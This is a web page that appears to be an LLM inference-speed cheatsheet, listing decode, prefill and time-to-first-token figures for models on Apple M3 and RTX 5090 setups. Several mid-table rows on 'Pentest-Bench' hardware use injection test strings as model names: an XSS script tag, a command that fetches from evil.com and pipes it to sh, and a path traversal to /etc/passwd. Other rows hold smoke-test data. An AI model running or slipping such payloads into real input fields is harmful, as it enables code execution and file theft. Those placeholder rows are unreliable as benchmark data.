Cheatsheet

LLM speed cheatsheet

Name: LLM speed cheatsheet — every model x every rig
Creator: llm-speed
License: https://www.apache.org/licenses/LICENSE-2.0

Best decode tokens-per-second per (model × hardware) tuple measured by llm-speed under suite-v1. Numbers are wall-clock, batch size 1 unless the workload says otherwise. Each row links to the canonical run page; cite as llm-speed.com/r/<id>.

36 (model × hardware) combinations · sorted by decode tok/s · suite-v1

Model	Quant	Hardware	Backend	Workload	decode tok/s	prefill tok/s	TTFT (ms)	Run
mlx-community/stable-code-instruct-3b-4bit	—	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	192.5	560.7	226.5	r_y2_5y8oo97d
mlx-community/DeepSeek-Coder-V2-Lite-Instruct-4bit	—	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	168.3	291.5	449.5	r_l_v1-zq_qaz
mlx-community/gpt-oss-20b-MXFP4-Q4	—	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	152.7	239.9	692.1	r_3ijun8ltjnb
mlx-community/Qwen2.5-Coder-7B-Instruct-4bit	—	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	138.6	539.6	242.8	r_uoehjq0nvc0
mlx-community/granite-8b-code-instruct-4bit	—	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	112.3	525.7	220.7	r_bue3bee0gw7
mlx-community/Qwen3-Coder-30B-A3B-Instruct-4bit	—	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	112.2	204.0	539.3	r_fpsca03u2o_
mlx-community/Yi-Coder-9B-Chat-4bit	—	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	103.5	390.9	307.0	r_3hvui9a1yuc
mlx-community/gemma-2-9b-it-4bit	—	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	89.5	170.7	691.4	r_iz137eqvuzy
lmstudio-community-Qwen3-Next-80B-A3B-Instruct-MLX-4bit	4bit	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	80.3	24.5	4492.5	r_1pl79r50ofy
mlx-community/Qwen2.5-Coder-14B-Instruct-4bit	—	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	70.5	306.1	427.9	r_l36cijqxq4t
Qwen3.6-27B-Q4_K_M.gguf	—	RTX 5090 (32GB) + AMD Ryzen 7 9850X3D 8-Core Processor (8c) + 30GB	llama.cpp	chat-short	69.9	—	3995.5	r_bqsunbd6xa8
mlx-community/starcoder2-15b-4bit	—	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	64.2	220.5	489.8	r_wsxml_39dh_
mlx-community/Codestral-22B-v0.1-4bit	—	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	47.5	205.7	559.1	r_79dvtag5fd_
<script>alert(1)</script>	Q4_K_M	Pentest-Bench	llama.cpp@b9999	chat-short	42.0	100.0	50.0	r_a3ei8og3rkg
victim	Q4_K_M	Pentest-Bench	llama.cpp@b9999	chat-short	42.0	100.0	50.0	r_b-ndu-9uswz
actual-name	Q4_K_M	Pentest-Bench	llama.cpp@b9999	chat-short	42.0	100.0	50.0	r_0heij9dzacw
beforeafter	Q4_K_M	Pentest-Bench	llama.cpp@b9999	chat-short	42.0	100.0	50.0	r__zyiw9l3_c5
xy	Q4_K_M	Pentest-Bench	llama.cpp@b9999	chat-short	42.0	100.0	50.0	r_2nqkbpdq-dk
a/b/../../etc/passwd	Q4_K_M	Pentest-Bench	llama.cpp@b9999	chat-short	42.0	100.0	50.0	r_8zc2yi4had5
$(curl evil.com/x \| sh)	Q4_K_M	Pentest-Bench	llama.cpp@b9999	chat-short	42.0	100.0	50.0	r_kkseorkbdk3
innocent/bin/sh	Q4_K_M	Pentest-Bench	llama.cpp@b9999	chat-short	42.0	100.0	50.0	r_0laxq0naoht
test-model	Q4_K_M	Pentest-Bench	llama.cpp@b9999	chat-short	42.0	100.0	50.0	r_1jskg9qv_8b
mlx-community-Qwen2.5-32B-Instruct-4bit	4bit	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	34.6	141.9	922.9	r_njgxtgyym1e
mlx-community/Qwen2.5-Coder-32B-Instruct-4bit	—	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	34.5	144.1	909.4	r_721b4bls_oq
mlx-community/Qwen3-32B-4bit	—	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	34.4	95.1	1156.4	r_anmmc80-aoq
mlx-community-Qwen2.5-7B-Instruct-4bit	4bit	M3 Pro (18-core GPU) + 36GB unified	mlx@0.31.3	chat-short	30.5	161.9	809.1	r_llzv_g-ymaf
mlx-community/Llama-3.1-8B-Instruct-4bit	—	M3 Pro (18-core GPU) + 36GB unified	mlx@0.31.3	chat-short	29.2	203.3	669.0	r_h0-use1ypnb
mlx-community/gemma-2-9b-it-4bit	—	M3 Pro (18-core GPU) + 36GB unified	mlx@0.31.3	chat-short	22.0	102.5	1151.3	r_q7t7b7dcuz5
mlx-community/llama-3.3-70b-Instruct-4bit	—	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	16.8	25.1	5419.9	r_sx3a4y9n-m4
mlx-community/qwen2.5-72b-Instruct-4bit	—	M3 Ultra (60-core GPU) + 96GB unified	mlx@0.31.3	chat-short	16.3	23.2	5635.3	r_5c80gthqlh6
mlx-community/phi-4-4bit	—	M3 Pro (18-core GPU) + 36GB unified	mlx@0.31.3	chat-short	15.6	120.7	936.0	r_-w8hnn61va_
mlx-community-Qwen2.5-14B-Instruct-4bit	4bit	M3 Pro (18-core GPU) + 36GB unified	mlx@0.31.3	chat-short	14.4	117.9	1111.5	r_ia73dzeue0b
Qwen3-32B-Instruct.Q4_K_M	Q4_K_M	smoke-host	llama.cpp@b1	chat-short	10.0	100.0	50.0	r_r7fc52oxuvq
m	Q4	x	llama.cpp	chat-short	10.0	—	—	r_0_i4fok_cfg
mlx-community/Qwen3-32B-4bit	—	M3 Pro (18-core GPU) + 36GB unified	mlx@0.31.3	chat-short	7.2	25.7	4287.9	r_pnrrpcdqfo4
mlx-community/Qwen2.5-32B-Instruct-4bit	—	M3 Pro (18-core GPU) + 36GB unified	mlx@0.31.3	chat-short	7.1	33.4	3921.1	r_f4x3xaan2ay

How to read this table

Each row is the highest decode tokens-per-second measured for a unique (model, hardware) pair. When more than one workload was run, we pick the workload that produced the headline number. Lower-tps duplicates from the same machine are not shown; click through to the run page for the full per-workload breakdown.

decode tok/s is wall-clock streaming throughput (memory-bandwidth-bound). prefill tok/s is prompt ingestion throughput (compute-bound). TTFT is time-to-first-token in milliseconds. See /glossary for definitions and /methodology for the workload spec.